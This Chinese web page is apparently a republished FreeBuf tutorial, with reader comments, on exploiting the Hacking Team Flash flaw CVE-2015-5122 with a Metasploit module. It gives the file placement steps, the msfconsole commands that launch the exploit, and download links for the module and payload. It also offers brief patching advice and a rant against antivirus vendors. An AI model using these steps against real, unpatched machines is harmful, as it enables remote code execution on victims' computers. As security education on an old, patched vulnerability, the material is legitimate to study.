CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

exploit failed

2017年5月23日 1157点热度 0人点赞 0条评论

exploit failed

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

Metasploit CVE-2015-5122 Flash漏洞利用教程

0xroot2015-08-19共360673人围观 ,发现 30 个不明物体系统安全

前段时间,Hacking Team军火库泄露闹得沸沸扬扬,(点击查看相关报道)各大安全公司也争先恐后地发布了各种的攻击代码分析,但是小编作为一只WEB狗,根本看不懂二进制。有了漏洞分析文章、了解了漏洞细节,但就是不告诉WEB狗狗们如何利用!(心中千万头草泥马啊)

在这篇文章中,我们将在Metasploit中利用CVE-2015-5122(Adobe Flash opaqueBackground Use After Free)Flash 0day 漏洞模块,这一漏洞出现在下载恶意Flash文件时候。最新版本的Adobe Flash播放器(http://www.securityfocus.com/bid/75712)爆出的漏洞出自ActionScript的三个字节数组(ByteArray,),opaqueBackground和BitmapData class。攻击者利用这些漏洞可以在受害者设备上远程执行任意代码。

CVE-2015-5122是Hacking Team泄露的军火库中有关Adobe Flash播放器(18.0.0.203)的第三枚0day,影响Windows、MacOSX和Linux平台上的IE、Chrome浏览器等主流浏览器。
国外发布这篇漏洞利用教程的时候,Adobe已经发布了安全更新。本教程仅供参考。

一.准备工作

首先下载利用代码,并且对利用代码进行重命名为:Adobe_Flash_HackingTeam_exploit.rb

接着在这里下载Payload,把msf.swf移动到:/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf
复制exploit到Metasploit 利用模块的文件夹:

mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

(因为在/usr/share/metasploit-framework/modules/exploits/windows/中没有flash这一文件夹,操作之前需要先新建flash文件夹 )

用下面的命令来检查文件是否已经复制到目标文件夹:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/

二.开始
开启一个新的终端并启动Metasploit:

service postgresql start
service metasploit start
msfconsole

现在我们启动了Metasploit并且加载了刚刚新加入的exploit,可以使用命令搜索到它:

search hackingteam

使用新添加的Exploit执行以下命令:

use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit

接着执行下面的命令检查cve-2015-5122模块需要使用到的选项:

show options

保持默认选项,执行“run”或者“exploit”命令来启动这个exp

exploit

开启一台运行Windows 8.1的虚拟机,使用存在漏洞的浏览器(火狐)并且安装版本为18.0.0.203的Flash播放器, 打开刚刚的链接。

三.演示视频:

四.预防工作:

及时更新Flash播放器;
及时更新系统漏洞补丁,保持系统更新;
安装杀毒软件和防火墙;
及时更新浏览器,使用最新版本;
不安装不需要的插件;

五.题外话
安全来自预防,寄希望于事后杀毒于事无补!

防毒=避孕
杀毒=打胎
免疫=上环结扎
克隆恢复=无痛人流
重装系统=投胎转世

现在的杀毒软件,干的基本上都是打胎的勾当,把病毒放进来(或部分放进来)再杀,从而欺骗普通用户,让用户觉得:这个杀毒软件有用,给我杀掉那么多病毒!我不想与杀毒软件的“专家”们争论所谓的技术问题,只想问大家一句:你购买的杀毒产品给你解决病毒问题了么?!

杀毒产品用户与厂商是一个合同关系,如果厂商不能有效给用户提供安全,老是经常让病毒侵入,反毒技术落后,升级响应不及时,厂商的这种违约行为又给了用户什么补偿?用户负责给厂商付钱,厂商给用户负了什么责?他们的责任尽到位了吗?!如果反病毒引擎过关的话,为什么仍然要依赖所谓的“专杀”?典型病毒需要借助免费的“专杀”处理,那么付费用户与未付费用户又有什么差别?!
我们鄙视的是现在的杀毒产品,而不是否定杀毒技术本身,这是个逻辑问题而不是技术问题,不要拿个例说事。
以防为主的防毒技术是日后反病毒技术的必然归宿。但微点为什么受到打压?广大用户为什么仍然在“享受”众多杀软厂商的愚民宣传?

请牢记:杀毒软件永远只代表软件厂商的利益!
动自己的手,让别人花时间杀毒去吧!
打你的的补丁,让别人花钱买杀软去吧!
免你的疫,让别人杀毒去吧!
避你的孕,让别人打胎去吧!
完善我们的工具箱,让别人束手无策去吧!

*参考来源:hackingtutorials,rapid7 ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

0xroot

0xroot39 篇文章等级: 6级
|
|
  • 上一篇:一个完美的Bug(CVE-2015-3077):利用Flash中类型混淆
  • 下一篇:病毒是如何将文件藏进注册表的

这些评论亮了

  • V回复
    然并卵,还是在沙盒里。
    )8(亮了
  • VV回复
    不懂就别吐槽杀软没用,360分分钟教你怎么做人
    )8(亮了
  • Rasiel回复
    不太明白那个service metasploit start
    这个,貌似真没说什么吧,也就贴出了rb地址。。。
    )6(亮了
  • qingshuihai(1级)回复
    试了下,没成功
    )6(亮了
发表评论

已有 30 条评论

  • V 2015-08-19回复1楼

    然并卵,还是在沙盒里。

    亮了(8)
    • asdfgggg 2015-08-20回复

      @ V agree , However,it has no any fuckly usefull ~!

      亮了(5)
  • VV 2015-08-19回复2楼

    不懂就别吐槽杀软没用,360分分钟教你怎么做人

    亮了(8)
    • f4cker 2015-08-20回复

      @ VV 刚出来的时候我试过的,上来的机器都有360,一点提示都没有,不过是在沙盒里,不能写。

      亮了(5)
  • Push丶EAX (4级) 2015-08-19回复3楼

    弱弱的问下,MSF怎么生成64位的下载者ShellCode

    亮了(5)
    • hela 2015-08-20回复

      @ Push丶EAX  download_exec.rb

      亮了(5)
  • 伟大娃娃 (2级) 2015-08-19回复4楼

    这文章结尾让前面刚花了钱打广告的某杀毒厂商怎么想。。。

    亮了(5)
    • 0xroot (6级)奔跑的蚂蚁 2015-08-19回复

      @ 伟大娃娃  蛤蛤蛤

      亮了(5)
  • oopww (1级) 2015-08-19回复5楼

    这有什么好发的呢。http://www.blackbap.org/thread-7517-1-1.html。我早就发了!

    亮了(3)
  • Rasiel 2015-08-19回复6楼

    不太明白那个service metasploit start
    这个,貌似真没说什么吧,也就贴出了rb地址。。。

    亮了(6)
    • 0xroot (6级)奔跑的蚂蚁 2015-08-19回复

      @ Rasiel service metasploit start 启动MSF

      亮了(5)
  • xxx 2015-08-19回复7楼

    【无意义言论 和谐 by FB客服】

    亮了(4)
  • c1ay___ 2015-08-19回复8楼

    可惜我家电脑装不下[doge][doge]

    亮了(4)
  • qingshuihai (1级) 2015-08-20回复9楼

    试了下,没成功

    亮了(6)
  • v-stick 2015-08-20回复10楼

    23呢?

    亮了(4)
  • kidofgalaxy (1级) 2015-08-20回复11楼

    是不是审核了1个月然后发出来了?

    亮了(4)
  • 白唱 2015-08-20回复12楼

    亮了(5)
  • Fiend520 (7级) 2015-08-20回复13楼

    要命了

    亮了(5)
  • 吐槽哥 2015-08-20回复14楼

    酱紫。。。

    亮了(5)
  • 阿不思 (2级) 2015-08-20回复15楼

    只针对flash版本18.0.0.203吗?旧版本flash貌似都提示版本不对。

    亮了(4)
  • xxoob 2015-08-20回复16楼

    什么呀,题目和内容完全不对,到底是利用的哪个漏洞?
    CVE-2015-5122(Adobe Flash opaqueBackground Use After Free)Flash 0day
    CVE-2015-5119 Adobe_Flash_HackingTeam_exploit.rb
    到底要讲哪个?
    虽然都一样利用,但是分清楚漏洞,不要混淆视听。

    亮了(4)
    • 0xroot (6级)奔跑的蚂蚁 2015-08-20回复

      @ xxoob 仔细看了一下原文 1.可以确定的是:msf.swf 是CVE-2015-5122的Payload Adobe_Flash_HackingTeam_exploit.rb是利用代码(exploit)
      2.文章中出现CVE-2015-5119可能是原文作者失误 把CVE-2015-5122的Payload存放在了/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/ (小编的理解是原文作者把存放payload的文件夹命名错了)
      感谢这位看官指出存在的问题O(∩_∩)O~

      亮了(4)
  • kkk 2015-08-21回复17楼

    Failed to load module: exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit 这种情况怎么处理?

    亮了(1)
    • G93 (1级) 2015-08-23回复

      @ kkk 先chmod 777 Adobe_HackingTeam_Flash.rb 再在msfconsole中 reload_all

      亮了(2)
  • fox4y (1级) 2015-08-25回复18楼

    这个不是youtube。。。那个

    亮了(2)
  • 下载地址是这个 2015-09-13回复19楼

    https://github.com/rapid7/metasploit-framework/raw/master/data/exploits/CVE-2015-5122/msf.swf
    文件下载地址

    亮了(0)
  • 下载地址是这个 2015-09-13回复20楼

    https://github.com/rapid7/metasploit-framework/raw/master/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
    这个也是下载地址

    亮了(0)
  • zoonctrl (5级)该怎么做好信息安全? 2015-09-21回复21楼

    学习了 呵呵 希望多一些这样的 分享

    亮了(1)
  • Guiker (1级) 2017-01-18回复22楼

    模块无法加载
    WARNING! The following modules could not be loaded!
    [-] /usr/share/metasploit-framework/modules/exploits/windows/browser/Adobe_Flash_HackingTeam_exploit.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/browser/Adobe_Flash_HackingTeam_exploit from /usr/share/metasploit-framework/modules/exploits/windows/browser/Adobe_Flash_HackingTeam_exploit.rb) due to Missing compatible Metasploit<major_version> class constant

    亮了(5)
    • aaa 2017-04-06回复

      @ Guiker  对比看看代码开头部分 是不是class Metasploit3 < Msf::Exploit::Remote
      Rank = GoodRanking
      include Msf::Exploit::Remote::Tcp

      亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

0xroot

0xroot

奔跑的蚂蚁

39 篇文章89 条评论

相关阅读

  • 存在漏洞的Java及Flash版本使用者众多
  • CVE-2016-1019 Flash漏洞被加入漏洞利用工具包“豪华午餐”
  • 夜访Hacking Team黑客
  • 利用metasploit进行信息收集
  • Metasploit+Python实现NTLMv2攻击

特别推荐

关注我们 分享每日精选文章

不容错过

  • 2016 FreeBuf互联网安全创新大会(FIT)精彩全纪录(下)FB独家2016-01-12
  • 运用Fluxion高效破解WiFi密码ArthurKiller2016-06-21
  • 一名白帽子是如何说服CEO增加漏洞奖金的……欧阳洋葱2016-08-10
  • 手把手教你找回加密程序的密码追影人2016-02-06

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me